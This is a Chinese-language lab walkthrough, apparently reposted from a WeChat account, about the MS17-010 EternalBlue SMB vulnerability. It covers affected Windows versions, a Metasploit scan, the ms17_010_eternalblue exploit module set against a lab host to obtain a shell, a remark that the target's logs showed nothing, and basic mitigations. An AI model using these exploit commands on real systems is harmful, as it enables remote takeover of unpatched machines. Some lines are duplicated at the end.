永恒之蓝(MS17-010)病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
漏洞介绍
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
影响范围
目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
靶机开放了445端口,可能存在ms17-010漏洞
选择auxiliary/scanner/smb/smb_ms17_010 进行漏洞发现
目标靶机极易出现ms17-010漏洞
打开靶机查看日志,这时候并无异常
![利用SMB漏洞 MS17永恒之蓝获取权限]( "利用SMB漏洞 MS17永恒之蓝获取权限")
回到msf选择加载攻击模块poc
Use exploit/windows/smb/ms17_010_eternalblueSet rhost 192.168.44.139Run
![利用SMB漏洞 MS17永恒之蓝获取权限]( "利用SMB漏洞 MS17永恒之蓝获取权限")
回到靶机查看系统日志,我是在21:30左右获取shell权限,但日志似乎无异常登陆,不知是否是日志管理程序强度不够
-
关闭445端口。
-
打开防火墙,安装安全软件。
-
安装对应补丁。
原文始发于微信公众号(NS Demon团队):利用SMB漏洞 MS17永恒之蓝获取权限
回到msf选择加载攻击模块poc
回到靶机查看系统日志,我是在21:30左右获取shell权限,但日志似乎无异常登陆,不知是否是日志管理程序强度不够
评论